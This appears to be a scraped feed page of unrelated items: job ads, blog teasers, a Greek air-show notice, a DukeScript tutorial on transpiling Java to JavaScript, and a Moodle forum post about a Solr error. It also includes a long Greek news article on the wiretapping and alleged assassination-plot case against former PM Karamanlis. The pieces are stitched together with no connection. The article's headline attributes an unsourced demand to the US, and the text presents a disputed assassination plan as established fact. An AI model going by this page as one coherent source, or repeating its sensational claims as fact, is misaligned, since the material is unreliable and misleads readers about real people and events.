monitoring/tuning executions + Highly self-motivated, self-directed, and attentive to detail. + Takes initiative with focus to fully complete task; excellent time management. + Excellent analytical, troubleshooting and problem solving abilities. + Strong written and verbal communication skills Pay, Benefits and Work Schedule: Office Depot and Office Max offers competitive salaries, a benefits package, which includes a 401(k) and more, along with plenty of opportunity to move and grow within our organization! For immediate consideration for this exciting position, please click the Apply Now button. Equal Employment Opportunity: Office Depot and Office Max is committed to providing equal employment opportunities in all employment practices. All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, citizenship status, marital status, age, disability, protected veteran status, sexual orientation or any other characteristic protected by law.
          Apache Mod Security Error While Login WordPress   

One of the most creepy issue Apache mod security error while login WordPress, which can happen with you if you are a WordPress user. Same thing happened with me most of the times, so I tried to solve this issue and spend many hours behind it. Writing this article purpose is just to save your […]

The post Apache Mod Security Error While Login WordPress appeared first on KnowledgeIDea.


          Automation Engineer - Marin Software - San Francisco, CA   
AngularJS, Hadoop, Hive, Presto, HBase, Apache Phoenix, Pig and Kafka. Out with the manual testing, in with the 100% automated testing and the continuous...
From Marin Software - Tue, 13 Jun 2017 18:37:50 GMT - View all San Francisco, CA jobs
          Technical Quality Engineer Lead - Marin Software - San Francisco, CA   
Understand the business and key drivers for success. JS Angular, Hadoop, HBase, Hive, Presto, HBase, Apache Phoenix, Spark, Scala, Pig and Kafka....
From Marin Software - Mon, 15 May 2017 22:30:30 GMT - View all San Francisco, CA jobs
          Was machen US-Kampfhubschrauber auf dem Grazer Flughafen?   
Drei Apache-Kampfhubschrauber der US-Army sorgten heute für Aufregung in der Luft und am Flughafen Graz. Das Wetter zwang die Piloten zu einem Ausweichmanöver.
          Cloud Security DevOps Engineer - Verizon - Basking Ridge, NJ   
AWS,Apache , Redis , MySQL &amp; Postgres , MongoDB , Ansible , Splunk , Github , Jenkins , and JIRA &amp; Confluence....
From Verizon - Thu, 29 Jun 2017 10:58:12 GMT - View all Basking Ridge, NJ jobs
          Το ΖΕΥΣ και τα Ε/Π της Α.Σ συμμετέχουν & τρελαίνουν κόσμο στο…» Kavala Air Sea Show» (KASS) 2017   
veteranos.gr
Το Θρυλικό  F-16 της Πολεμικής Αεροπορίας  ετοιμάζεται να τρελάνει κόσμο Σάββατο και Κυριακή  1 & 2 Ιουλίου στο » Kavala Air Sea Show» (KASS) 2017

Αλλά και  συμμετοχή της Αεροπορίας Στρατού προβλέπεται να   δυναμικότερη και μεγαλύτερη, αντάξια της προσμονής των δεκάδων χιλιάδων θεατών Ελλήνων ,Βαλκάνιων και όχι την 1 & 2 Ιουλίου στην Καβάλα!
20160625-26-Airseashow_-Vasilis-Tziatas-43-1100x619
Η εικόνα  από την τελευταία επίδειξη του 2ου ΤΕΕΠ στο KASS 2016 στο Κεντρικό Λιμάνι Καβάλας «Απόστολος Παύλος»
Ελληνικός Στρατός /  1η Ταξιαρχία Αεροπορία Στρατού συμμετέχει με :
1 Χ ΑΗ-64 Α  APACHE – 1st Attack Helicopter Battalion (F & S)
1 Χ ΑΗ-64 D HA Longbow APACHE – 2nd Attack Helicopter Battalion (F & S)
2 X UH-1H «HUEI» Bell UH-1 Iroquois (F & S)


Το πλήρες Πρόγραμμα
veteranos.gr

          How to Install Joomla with Apache on Debian 9 (Stretch)   

HowToForge: Joomla is one of the most popular and widely supported open source content management system (CMS) platform in the world.


          DukeScript: Transpile Plain Java into JavaScript   

DukeScript is all about smooth communication between Java and JavaScript. It comes with no surprise that one can use the DukeScript infrastructure to easily transpile Java code into JavaScript and run it in a browser. Here is a quick how-to:

Start from command line

Of course, if you are an IDE junkie, you may prefer a visual way of getting started, but to prove that it is really just a matter of a few commands, let’s set everything up from a command line. Install Java, install Maven and invoke:

$ mvn archetype:generate \ -DarchetypeGroupId=com.dukescript.archetype \ -DarchetypeArtifactId=knockout4j-archetype \ -DarchetypeVersion=0.17 \ -Dwebpath=client-web \ -DgroupId=org.your.test \ -DartifactId=runjavainbrowser \ -Dversion=1.0-SNAPSHOT $ cd runjavainbrowser $ mvn install -DskipTests

and that is it! Just three shell commands and you have all the environment you need!

Write Your Code!

Let’s open the DataModel.java that contains the main logic and let’s add there some Java code.

$ vi
      client/src/main/java/org/your/test/DataModel.java

there are few methods annotated with @Function annotation. They are ready to be invoked when a button on the HTML page is pressed. Let’s modify one of them:

@Function static void turnAnimationOn(Data model) { model.setMessage("I can run Java in any
      browser!"); }

Of course you can put much more logic into the Java method - most of the core Java is supported. Now let’s try it. Rebuild and launch in a browser:

$ mvn install -DskipTests
      $ mvn -f client-web/pom.xml bck2brwsr:show

When the browser page is opened, press the Start button and congratulations: your first Java code has been successfully transpiled to JavaScript and executed in a browser!

So Easy! Where’s the Catch?

Just a few simple steps and my Java code is running in the browser. Is everything so easy, or is there a hidden catch?

Of course, the transpiling has some limitations. It doesn’t support all Java APIs, but it shall be good enough for running Java algorithms in the browser and perform client side validations, computations, etc.

Moreover there is something really special: DukeScript project doesn’t provide the transpiling technology - we are just using it with the goal to make writing portable Java applications easy. As with any other system (Android, desktop, iOS) we always choose the best JVM available on the system. However, in case of plain browsers, there are two very good choices: Bck2Brwsr VM and TeaVM. With DukeScript infrastructure you can easily choose between any of them - e.g. no vendor lock-in and your choice to select the better JVM for your tasks. To try TeaVM just execute:

$ mvn -f client-web/pom.xml -Pteavm install -DskipTests bck2brwsr:show

What is better: Bck2Brwsr or TeaVM?

What transpiling technology is better? Depends on your needs. Each of them has its benefits. TeaVM compiles the whole application into a single JavaScript file. Bck2Brwsr produces one JavaScript file per JAR file - e.g. comes with better support for modularity. Bc2Brwsr can execute as complex applications as Javac in the browser, but is intentionally singlethreaded. TeaVM can simulate threads and comes with better in browser debugger integration.

The choice is yours. DukeScript projects is just proud to offer you two alternative transpiling solutions.

Packaging for Web

When your application is running, it is time to package it for the web. Again, it is easy. Execute following commands:

$ mvn -f client-web/pom.xml package -DskipTests $ unzip -v client-web/target/runjavainbrowser-web-1.0-SNAPSHOT-bck2brwsr.zip public_html/index.css public_html/index.html public_html/lib/emul-0.19-rt.js public_html/lib/net.java.html.boot-1.3.js public_html/lib/ko4j-1.3.js
      public_html/lib/runjavainbrowser-js-1.0-SNAPSHOT.js public_html/lib/net.java.html.sound-1.3.js public_html/lib/runjavainbrowser-1.0-SNAPSHOT.js public_html/lib/net.java.html-1.3.js public_html/lib/net.java.html.json-1.3.js public_html/bck2brwsr.js public_html/runjavainbrowser.js

and you can see that a ZIP file has been create for you and is ready to be uploaded to your web server and used from your HTML pages. Alternatively you can do the same with TeaVM:

$ mvn -f client-web/pom.xml package -Pteavm -DskipTests $ unzip -v /home/devel/tmp/transpile/runjavainbrowser/client-web/target/runjavainbrowser-web-1.0-SNAPSHOT-teavm.zip public_html/index.css public_html/index.html public_html/teavm.js

and upload or use the single teavm.js file containing all your transpiled Java code.

Development and Testing

The power of DukeScript is in high portability of the applications. As such it is suggested to develop your application on desktop with a JavaFX WebView component - then all the goodies like no redeploys or easy Java and HTML debugging work. Once your application is running, you can then just transpile it.

Should there be any differences between desktop and transpiled version, the best is to write and execute a unit test - if it behaves differently between the standard Java on desktop and the one running in the browser, please contact our support and send us the test case - we are always ready to help.

Enjoy Java in a browser done in the DukeScript way!


          Apache Hive 快速入门 (CentOS 7.3 + Hadoop-2.8 + Hive-2.1.1)   

          Ubuntu彻底删除/卸载mysql,php,apache   

          On Apache Ignite, Apache Spark and MySQL. Interview with Nikita Ivanov   
“Spark and Ignite can complement each other very well. Ignite can provide shared storage for Spark so state can be passed from one Spark application or job to another. Ignite can also be used to provide distributed SQL with indexing that accelerates Spark SQL by up to 1,000x.”–Nikita Ivanov. I have interviewed Nikita Ivanov,CTO of […]
          Laser system onboard   
Raytheon Company and the U.S. Army Apache Program Management Office, in collaboration with USSOCOM, recently completed a successful flight test of a high energy laser system onboard an AH-64 Apache at White Sands Missile Range, New Mexico. The demonstration marks the first time that a fully integrated laser system successfully engaged and fired on a target from a rotary-wing aircraft over a wide variety of flight regimes, altitudes and air speeds.
          100.00 EUR de remise sur MSI GE62 7RE-024XFR Apache Pro   

Jusqu'au 03/07/2017 12:00, Vente Flash exceptionnelle sur MSI GE62 7RE-024XFR Apache Pro à seulement 1 199.90 EUR
Pour accéder directement à la vente, cliquez ici !


          70.00 EUR de remise sur MSI GE72VR 7RF-425FR Apache Pro   

Jusqu'au 03/07/2017 12:00, Vente Flash exceptionnelle sur MSI GE72VR 7RF-425FR Apache Pro à seulement 1 729.90 EUR
Pour accéder directement à la vente, cliquez ici !


          California COA Affirms $49M Judgment in Inter-Tribal Contract Dispute   
Here is the opinion in Yavapai-Apache Nation v. La Posta Band of Diegueno Mission Indians: Yavapai-Apache Nation v La Posta Band An excerpt: This appeal arises from a contract dispute between two Indian tribes: Yavapai Apache Nation (YAN) and La Posta … Continue reading
          ΗΠΑ προς Ελλάδα: «Απαλλάξτε τους πράκτορες της CIA που διώκονται όπως κάνατε με τα στελέχη του ΤΑΙΠΕΔ»!   
Tεράστιες πιέσεις ασκούνται από την αμερικανική πλευρά προκειμένου να παύσει η δίωξη κατά του Αμερικανού πράκτορα της CIA Γ.Μπαζίλ (στον κύκλο στην φωτό αριστερά) και των συνεργών του για την κατασκοπεία που ασκούσε η υπηρεσία σε βάρος τις χώρας τουλάχιστον για επτά χρόνια 2003-2009 και για τον σχεδιασμό της δολοφονίας του πρώην πρωθυπουργού Κώστα Καραμανλή.

Οι Αμερικανοί ενθαρρυμένοι από την ευνοϊκή κατάληξη της υπόθεσης των τριών στελεχών του ΤΑΙΠΕΔ, πολιτών χωρών των δανειστών που απηλλάγησαν από τις κατηγορίες περί απιστίας σε βάρος του δημοσίου με εξπρές-απόφαση του Αρείου Πάγου, τώρα ζητούν το ίδιο και για τους πράκτορές τους και απειλούν με παύση της στρατιωτικής βοήθειας προς την Ελλάδα, όπως απειλούσαν οι δανειστές με μπλοκάρισμα της δόσης!

Η δικογραφία επέστρεψε στο Πρωτοδικείο με απόφαση του Αρείου Πάγου, μετά από  οκτώ μήνες που αιωρούταν ανάμεσα στο Πρωτοδικείο και το Εφετείο.

Για την υπόθεση, που έχει τρία σκέλη, υπέβαλε πρόταση τον περασμένο Οκτώβριο η Εισαγγελέας Μαρία-Σοφία Βαΐτση η οποία ζήτησε την παραπομπή τεσσάρων κατηγορουμένων μεταξύ των οποίων και ενός Αμερικανού υπηκόου , πρώην στελέχους μυστικών υπηρεσιών για αδικήματα που αφορούν κατασκοπεία μέσω τηλεφωνικών υποκλοπών «που αφορούσαν τα συμφέροντα του κράτους» το διάστημα 2004-2005.

Έκρινε επίσης ότι πρέπει να δικαστούν δύο υπάλληλοι της ΕΥΠ για παραβίαση μυστικών της Πολιτείας με ηθικό αυτουργό στην πράξη τους τον πρώην υπουργό Μιχάλη Καρχιμάκη.

Η υπόθεση πήγε ακολούθως, στο Συμβούλιο Πλημμελειοδικών το οποίο έκρινε πως είναι αναρμόδιο να κρίνει την υπόθεση, λόγω των αδικημάτων και του δικαστηρίου που θα πρέπει να τα δικάσει, διαβιβάζοντας τα στοιχεία στο Συμβούλιο Εφετών.

Μετά από λίγο καιρό ο Εισαγγελέας Εφετών Κ. Πούλιος υπέβαλε πρόταση με την οποία ζητά να επιστραφεί η δικογραφία στην Ευελπίδων με σκεπτικό ότι είναι αναρμόδιο το Συμβούλιο Εφετών καθώς τα αδικήματα πρέπει να δικαστούν σε Μικτό Ορκωτό Δικαστήριο και όχι σε Τριμελές Εφετείο Κακουργημάτων και επομένως την υπόθεση θα πρέπει να κρίνει το Συμβούλιο Πλημμελειοδικών.

Πλέον η χιλιάδων εγγράφων δικογραφία με στοιχεία που δεν έχουν ποτέ ξανά απασχολήσει τις δικαστικές αρχές τα χρόνια της μεταπολίτευσης, αναμένει την κρίση του Συμβουλίου Εφετών περί του ποιο δικαστικό σχήμα θα αποφανθεί για την ποινική εξέλιξη της σημαντικής υπόθεσης.

Η υπόθεση του σχεδίου δολοφονίας του Κώστα Καραμανλή απασχολεί τη Δικαιοσύνη από το 2011 ενώ ένα χρόνο μετά, το 2012, ασκήθηκε ποινική δίωξη κατά αγνώστων δραστών για αδικήματα που αφορούν προπαρασκευαστικές ενέργειες εσχάτης προδοσίας, διατάραξης της ομαλής λειτουργίας του πολιτεύματος και της αποστέρησης πρωθυπουργού από την ενάσκηση της εξουσίας που του παρέχει το Σύνταγμα.

Αφορμή για τη δίωξη αποτέλεσε η δημοσιοποίηση στοιχείων που φαινόταν να προέρχονται από ρωσικές μυστικές υπηρεσίες, τα οποία αναφέρονταν σε σχέδιο εξόντωσης του πρώην πρωθυπουργού και προσπάθεια αποσταθεροποίησης της χώρας, στην οποία είχαν συμπεριλάβει και τα γεγονότα μετά τη δολοφονία Γρηγορόπουλου, με στόχο να εμποδιστεί η ενεργειακή πολιτική της κυβέρνησης.

Η υπόθεση ανατέθηκε στον ανακριτή Δημήτρη Φούκα ο οποίος συνένωσε τη δικογραφία για το «σχέδιο Πυθία» με αυτές για τις υποκλοπές και την παραβίαση μυστικών της πολιτείας από υπαλλήλους της ΕΥΠ και τρία χρόνια μετά εξέδωσε πολυσέλιδο πόρισμα στο οποίο κατέγραψε τα στοιχεία που συνέλεξε από τη μεθοδική έρευνα του.

Ο ανακριτής κατέγραφε στο πόρισμα του κρίσιμα στοιχεία για το σχέδιο δολοφονίας του πρώην πρωθυπουργού συνδέοντας άμεσα το «σχέδιο Πυθία» σε προσπάθεια άσκησης πίεσης και εξαναγκασμού της ελληνικής κυβέρνησης να αλλάξει πολιτική σε θέματα που αφορούσαν τις διεθνείς σχέσεις της χώρας:

«Σκοπός των δραστών φαίνεται ότι ήταν η διακοπή της πολιτικής και οικονομικής προσέγγισης της Ελλάδας με τη Ρωσία που τότε είχε αρχίσει να διαμορφώνεται σε κρίσιμους τομείς ειδικότερα της ενέργειας, των εξοπλισμών και των κρατικών προμηθειών» ανέφερε ο κ. Φούκας.

Ο ανακριτής κατέγραφε στο πόρισμα του την ενεργειακή πολιτική της κυβέρνησης Καραμανλή με μνεία στις συμφωνίες για τον αγωγό Μπουργκάς-Αλεξανδρούπολη και τον αγωγό South Stream.

Επικαλούμενος ο κ. Φούκας στοιχεία της ανάκρισης αλλά και δημοσιευμένα στο Wikileaks στοιχεία, ανέφερε πως η προσέγγιση της Ελλάδας με τη Ρωσία προκάλεσε ενέργειες εκ μέρους των ΗΠΑ ώστε να ανατραπούν οι εν λόγω συμφωνίες για τους ρωσικούς αγωγούς.

Αναφέρεται επίσης στο πόρισμα ότι: «Το γεγονός της στήριξης της αμερικανικής πλευράς προς τον αγωγό ΤΑΡ εκτιμάται ότι μεταφέρθηκε στις ελληνικές κυβερνήσεις μετά το 2009, επιβεβαιώθηκε δε από την κατάθεση του μάρτυρα Β.Ρ (σσ αναφέρεται το όνομα γνωστού επιχειρηματία), ο οποίος μετά από συνάντηση του με τον πρόεδρο των ΗΠΑ τον Μάιο του 2012 μετέφερε στην ελληνική πολιτική ηγεσία την αμερικανική θέση. Αποτέλεσμα ήταν η σταδιακή εγκατάλειψη των σχεδίων των αγωγών και η δέσμευση της ελληνικής πλευράς στο σχέδιο του αγωγού ΤΑΡ. Επίσης εγκαταλείφθηκε το σχέδιο προμήθειας στρατιωτικού υλικού από τη Ρωσία.»

Για την υπόθεση αυτή ωστόσο η έρευνα δεν οδήγησε σε πρόσωπα και έτσι το σκέλος αυτό της δικογραφίας παραμένει χωρίς κατηγορούμενους.

Για την υπόθεση των τηλεφωνικών υποκλοπών, στην οποία είναι κατηγορούμενος για κατασκοπεία 65χρονος πρώην υπάλληλος της Αμερικανικής Πρεσβείας, ο κ. Φούκας αναφέρει ότι:

«Από τον Αύγουστο του 2004 μέχρι και το Μάρτιο του 2005 ο William Bazil, Αμερικανός πράκτορας, επιχείρησε με πρόθεση να λάβει σε γνώση του απόρρητες πληροφορίες που αφορούν στα συμφέροντα της ελληνικής δημοκρατίας μέσω τηλεφωνικών υποκλοπών».

Από τα στοιχεία του ανακριτή προέκυψε πως η σύζυγος του συγκεκριμένου προσώπου, ήταν εκείνη που είχε αγοράσει τα καρτοκινητά-σκιές από την Ακτή Μιαούλη με το ψευδώνυμο Πέτρος Μάρκου, τα οποία χρησιμοποιήθηκαν για την παρακολούθηση δεκάδων πολιτικών, μελών της τότε κυβέρνησης αλλά και δεκάδων άλλων προσώπων. Από την άρση απορρήτου μιας εκ των τεσσάρων τηλεφωνικών συνδέσεων προέκυψε ότι η τηλεφωνική σύνδεση ενεργοποιήθηκε και σε άλλη συσκευή με στοιχεία συνδρομητή American Embassy. Μετά την αποκάλυψη των υποκλοπών ο William Bazil εξαφανίστηκε από την Ελλάδα.

Στο πόρισμα του ο κ. Φούκας αναφέρει μεταξύ άλλων: «στις 26/03/2014 επικοινώνησε με το ανακριτικό γραφείο πρώην στέλεχος της ΕΥΠ, με τον οποίο υπήρξε προηγούμενη συνεργασία, ζητώντας συνάντηση με τον ανακριτή. Η συνάντηση έγινε αυθημερόν και αυτός αναφέρθηκε σε τηλεφωνική επικοινωνία του με στέλεχος των μυστικών υπηρεσιών των ΗΠΑ που είχε υπηρετήσει παλαιότερα στην Ελλάδα, ο οποίος του ζήτησε να έρθει σε επαφή με τον ανακριτή και να μεταφέρει την άποψη ότι οι ελληνοαμερικανικές σχέσεις είναι πλέον φιλικές και ότι η έρευνα πρέπει να σταματήσει διότι εμποδίζει την περαιτέρω ανάπτυξη τους».

Για το τρίτο σκέλος της υπόθεσης που αφορά παράνομες ενέργειες στελεχών της ΕΥΠ ο κ. Φούκας ανένεφερε ότι: «Τέλος κατά το ανακριτικό πόρισμα, που επικαλείται αναφορές στο Wikileaks, προκύπτει ότι υπήρχαν υπάλληλοι της ΕΥΠ “επιρρεπείς σε διαρροές οι οποίοι χαρακτηρίζονται ως δυσαρεστημένοι”.

Ο ανακριτής αναφέρει πως εντός του 2005, υπάλληλοι της ΕΥΠ που είχαν πρόσβαση σε απόρρητα στοιχεία, τα παρέδιδαν σε μη δικαιούμενα πρόσωπα και συγκεκριμένα στον τότε βουλευτή Μιχάλη Καρχιμάκη».

Να σημειωθεί πως ο κ. Καρχιμάκης , που κατηγορείται για ηθική αυτουργία σε παραβίαση μυστικών της Πολιτείας, έχει απολογηθεί για την υπόθεση και έχει αφεθεί ελεύθερος. Ο πρώην υπουργός αρνείται την κατηγορία -της οποίας φυσικός αυτουργός φέρεται μία υπάλληλος της ΕΥΠ- και αποδίδει την εμπλοκή του σε λόγους πολιτικής σκοπιμότητας καθώς η καταγγέλλουσα την υπόθεση αναφέρεται σε «διωγμό που υπέστησαν» συνάδελφοι της συνδικαλιστές στην ΕΥΠ επί κυβέρνησης Γ. Παπανδρέου.

Δηλαδή πρόκειται για κανονική κατασκοπεία όπου εκτός από την απόσπαση στοιχείων από το υπουργείο Εθνικής Αμυνας το 2004-2005 η ίδια ομάδα σχεδίαζε και την δολοφονία του τότε πρωθυπουργού Κώστα Καραμανλή.

Συγκεκριμένα στο δικόγραφο της παραπομπής σε δίκη μελών της συμμορίας, υπάρχει υπάλληλος του υπουργείου Άμυνας, ο οποίος δεν έχει «αγνώστων στοιχείων ταυτότητας», κατά το σκεπτικό της εισαγγελέως, έκλεψε στοιχεία για τα προγράμματα των επιθετικών ελικοπτέρων AH-64D Apache, των αρμάτων μάχης LEO2HEL, των ρωσικών SHORADS Τor-M1 και την επιχειρησιακή διαθεσιμότητα των επίσης ρωσικών αντιαεροπορικών συστημάτων πυραύλων μακρού βεληνεκούς S-300PMU1.

Oλα αυτά τα στοιχεία δόθηκαν σε "ξένη δύναμη" και ορισμένα από αυτά αλλά σε βουλευτή του ΠΑΣΟΚ.

Επίσης στην ίδια υπόθεση για τις υποκλοπές και το σχέδιο δολοφονίας σε βάρος του πρώην πρωθυπουργού Κ. Καραμανλή, περιλαμβάνονται στην εισαγγελική πρόταση παραπομπής του Αμερικανού πράκτορα William B. και τεσσάρων ακόμη συνεργών του.

Το πρώτο αφορά το γεωγραφικό εύρος των παράνομων συνακροάσεων, που δεν περιορίζονταν στο λεκανοπέδιο Αττικής, αλλά εκτείνονταν έως την Κάσο και την Κάρπαθο. Το δεύτερο, ότι ένα από τα κινητά-σκιές χρησιμοποιούνταν εν αγνοία του ιδιοκτήτη του.

Το πιο σημαντικό είναι ότι η παρακολούθηση τηλεφωνημάτων του πρώην πρωθυπουργού έγινε και από την… Αυστραλία!

Μάλιστα, η παρακολούθηση των τηλεφωνημάτων του κ. Καραμανλή έγινε από την Αυστραλία πριν την επίσκεψή του εκεί το 2007.

Το από ποιους είναι άγνωστο και ίσως θα παραμείνει άγνωστο. Όπως και το γιατί…

Στην εισήγησή της προς το Συμβούλιο Πλημμελειοδικών, η αντεισαγγελέας Πρωτοδικών, Μ. Βαΐτση, σημειώνει ότι τα καρτοκινητά-σκιές ενεργοποιήθηκαν κυρίως μεταξύ του Ιουλίου 2004 και του Μαρτίου 2005, εντός του τριγώνου Πύργος Αθηνών-Πλατεία Μαβίλη-Ανατολικό Κολωνάκι, η εμβέλεια όμως των παράνομων συνακροάσεων εκτεινόταν έως το νοτιότερο άκρο της Ελλάδας.

Συγκεκριμένα, υποκλοπές στα υπό παρακολούθηση τηλέφωνα δεκάδων πολιτικών αξιωματούχων και αλλοδαπών μπορούσαν να γίνουν στη νότια Πελοπόννησο, τα Κύθηρα, την Τήνο, τη Μύκονο, τη Νάξο, τη Σίφνο, τη Σέριφο έως και τη Ρόδο, το Καστελλόριζο, την Τήλο, την Κάσο και την Κάρπαθο, όπου βρίσκεται το σπίτι του Ελληνοαμερικανού πράκτορα της CIA.

Ακόμη, το παράνομο δίκτυο κάλυπτε σχεδόν το σύνολο του λεκανοπεδίου Αττικής, αλλά όχι την κεντρική ή βόρεια Ελλάδα. Ο William B. είχε συχνές τηλεφωνικές επαφές με την πρεσβεία των ΗΠΑ στην Αθήνα και με τηλεφωνικούς αριθμούς στην αμερικανική πολιτεία Μέριλαντ, όπου ζει μόνιμα. Η εισαγγελέας επισημαίνει ότι τα μέλη της κυβέρνησης Καραμανλή και ο ίδιος ο πρώην πρωθυπουργός απέφευγαν να μιλούν στα κινητά τους τηλέφωνα, λαμβάνοντας μέτρα προστασίας, αγνοούσαν όμως ότι γίνονταν υποκλοπές, ακόμη και σε τουριστικές περιοχές τις οποίες είχαν επισκεφθεί το καλοκαίρι του 2004.

Στις 26 Μαΐου 2004, ο Ν. Τζ., ναυτικός από το Αγκίστρι, ζήτησε από κατάστημα κινητής τηλεφωνίας στον Πειραιά να διακόψει τη σύνδεσή του με εταιρεία, αρνούμενος παράλληλα να την αντικαταστήσει με «κάρτα», όπως συνήθως συνέβαινε τότε.

Όμως, προς μεγάλη του έκπληξη, όπως κατέθεσε αργότερα στις Αρχές και αποδείχθηκε στη συνέχεια, ο αριθμός του κινητού του μετατράπηκε σε καρτοκινητό και ήταν μεταξύ αυτών που πωλήθηκαν στη σύζυγο του William B., Irene, από το ίδιο κατάστημα της Ακτής Μιαούλη.

Στις 30 Ιουνίου 2004, σχεδόν έναν μήνα μετά την ημέρα που ο ναυτικός διέκοψε τη σύνδεση και ενώ βρισκόταν ναυτολογημένος ως κυβερνήτης στο πλοίο «Αμφιτρίτη», σε δρομολόγιο των νήσων Κυκλάδων, έκανε κλήσεις στα άλλα καρτοκινητά-σκιές, με προφανή στόχο να συνδεθεί με το παράνομο λογισμικό, ενώ έτερο κινητό-σκιά δέχθηκε την ίδια περίοδο γραπτά μηνύματα (σ.σ.: αυτός είναι ο τρόπος σύνδεσης με άλλα κέντρα παρακολούθησης) από τη Μ. Βρετανία, τη Σουηδία, την Ινδία και την Αυστραλία.

Κοινώς, οι όποιες συνομιλίες του Κ. Καραμανλή και των υπουργών του παρακολουθούνταν σε όλα τα μήκη και πλάτη της Γης.
ΠΗΓΗ PRONEWS

          Sr. DevOps Engineer - Elastic Search (EKL) (Local candidates only) - Whiting House Technologies - Saint Paul, MN   
Unix/Linix, Microsoft, Oracle, SQL server, MySQL, MongoDB, SSH, web and app technologies (IIS, apache, tomcat, JBoss), VMware, AD and Storage/SAN....
From Whiting House Technologies - Tue, 16 May 2017 12:38:23 GMT - View all Saint Paul, MN jobs
          Sr. DevOps Engineer - Splunk & AppDynamics (Local candidates only) - Whiting House Technologies - Saint Paul, MN   
Unix/Linix, Microsoft, Oracle, SQL server, MySQL, MongoDB, SSH, web and app technologies (IIS, apache, tomcat, JBoss), VMware, AD and Storage/SAN....
From Whiting House Technologies - Tue, 16 May 2017 12:38:23 GMT - View all Saint Paul, MN jobs
          Sr. DevOps Engineer - CI/CD Jenkins (Local candidates only) - Whiting House Technologies - Saint Paul, MN   
Unix/Linix, Microsoft, Oracle, SQL server, MySQL, MongoDB, SSH, web and app technologies (IIS, apache, tomcat, JBoss), VMware, AD and Storage/SAN....
From Whiting House Technologies - Tue, 16 May 2017 12:38:22 GMT - View all Saint Paul, MN jobs
          Sr. DevOps Engineer - Performance & Load Testing (Local candidates only) - Whiting House Technologies - Saint Paul, MN   
Unix/Linix, Microsoft, Oracle, SQL server, MySQL, MongoDB, SSH, web and app technologies (IIS, apache, tomcat, JBoss), VMware, AD and Storage/SAN....
From Whiting House Technologies - Tue, 16 May 2017 12:38:08 GMT - View all Saint Paul, MN jobs
          Cloud Security DevOps Engineer - Verizon - Basking Ridge, NJ   
AWS,Apache , Redis , MySQL &amp; Postgres , MongoDB , Ansible , Splunk , Github , Jenkins , and JIRA &amp; Confluence....
From Verizon - Thu, 29 Jun 2017 10:58:12 GMT - View all Basking Ridge, NJ jobs
          IIS 8/URL Rewrite/ARR setting client affinity per context   

So, here is our situation:  We are using IIS 8 as a web frontend for a number of java apps hosted in Apache Tomcat.  Some of those apps require client affinity (sticky sessions) while some need to remain stateless (web services, etc).  I haven't seen a way to set a client affinity flag on a per server basis.  I am trying to keep this at the web server layer as we use either Azure Load Balancing or NLB depending on the environment, and I would like to keep the solution consistent.

I thought about maybe creating 2 server farms, and putting all the stateless app URL Rewrites in one farm, leaving client affinity off, and putting the other apps in a 2nd server farm, setting client affinity on. I don't like the idea of adding the extra server farm layer to what's already there, but I haven't been able to find a better, or even another approach.

Any input/assistance would be appreciated.  Best practices, articles, anything!

Thank you.


          Bajaj Pulsar NS 160 vs TVS Apache RTR 160   

So the all-new Bajaj Pulsar NS 160 is close to its launch and the upcoming Bajaj Pulsar model will soon become the first-ever 160cc motorcycle to go on sale under the Pulsar moniker. Also, from the looks of it, the NS 160 is target squarely the TVS Apache RTR 160. The Apache offers a grunty motor, decent […]

The post Bajaj Pulsar NS 160 vs TVS Apache RTR 160 appeared first on CarBlogIndia.


          初めてのWebサーバ「Apache」CentOS 7編 (NextPublishing)   
初めてのWebサーバ「Apache」CentOS 7編 (NextPublishing)
初めてのWebサーバ「Apache」CentOS 7編 (NextPublishing)
キンドル
大津 真
インプレスR&D (2017-05-26)
アマゾンで探す
Myバインダーへ追加する
メディアマーカー詳細ページ

          Ask.com-Statusseite einsehbar - Bericht   
Der Suchmaschinenbetreiber Ask.com gibt mehr Informationen preis, als er eigentlich sollte: Auf einer Apache-Statusseite lassen sich zahlreiche Suchanfragen von Nutzern verfolgen. Seit einem Monat hat das Unternehmen nicht auf die Fehlermeldung reagiert.
          Quickly Setup A WordPress Testing Environment With InstantWP   
InstantWP is a free tool used to quickly and easily create a WordPress testing environment. It ships with everything you need to get a local install of WordPress up and running. Apache, PHP, MySQL, and WordPress 3.6 are prepackaged. You may be wondering why WordPress 3.6 is installed and not (more...)
          Développeurs - Intégrateurs techniques Java J2EE (H/F) Expertise technique - ON-X - Ontario   
MOTS CLÉS Java, J2EE. Spring, Hibernate, Struts, Tomcat , Apache, WebServices ( Rest, SOAP ), JAX, JPA2 (persistence), CDI (context and dependency injection),...
From ON-X - Sun, 02 Apr 2017 07:26:34 GMT - View all Ontario jobs
          ASP   
(Application Service Provider) Hosted software contractor. An ASP operates software at its data center, which customers access online under a service contract. The first wave of ASPs were application outsourcers, who hosted software packages from established enterprise software vendors such as SAP, Peoplesoft and Oracle. They are being superceded by a larger group of 'web-native' or 'net-native' ASPs, who have developed their own software, often using open-source platforms such as Linux, Apache and Perl, specifically for delivery as a hosted service.
          Senior / Principal Java / Scala Engineers - WinterWyman - Burlington, MA   
JSON, REST, SOAP, JDBC, JavaScript, Tomcat, Apache and Linux. Scala, Cloud technologies, Cassandra (or other noSQL technologies), modern Javascript frameworks,... $150,000 a year
From WinterWyman - Mon, 19 Jun 2017 21:41:21 GMT - View all Burlington, MA jobs
          Reggaebomb ft Apache & Crucial Warrior   

https://www.facebook.com/events/212301348964005/?ref_newsfeed_story_type=regular



          ★ Interesting Things You May Have Missed on July 26, 2012   
Explaining what JavaScript is to non-programmers Valuable Java, JavaScript and ADF resources 5 Ways to Secure Your Google Account How to setup Git on Windows Master the basics of Groovy, a general-purpose scripting language that runs on the Java Virtual Machine 8 Mind-Bending Interview Questions That Google Asks Its Engineers Introduction to Apache, the most […]
          Global search   

by Heather P.  

We are on a Moodle 3 looking to move to a 3.3 on ubuntu 14.

Upgraded the php to 5.6 

I've tried to put the solr server on as per the instructions on the documentation page https://docs.moodle.org/33/en/Global_search#Solr_5.2F6_schema_setup but I think I'm on a later version of php to the one it is referring to and I've done my best with it, and it offers up a warning about there being a later version of pecl.

I have extremely limited ubuntu skills, but I thought I had installed the solr server, unfortunately if I have I don't know where.

I've restarted apache.

In Moodle on the global search plugin page (and I'm currently on a test site/test server) at point 3 it says 'The search engine is not available. Please contact your administrator'.

This leads me to believe that I obviously got something wrong in my solr install / set up.

In the php error log I'm getting

[30-Jun-2017 14:39:01 Europe/London] PHP Warning:  PHP Startup: Unable to load dynamic library '/usr/lib/php/20131226/solr.so' - /usr/lib/php/20131226/solr.so: undefined symbol: php_json_decode_ex in 
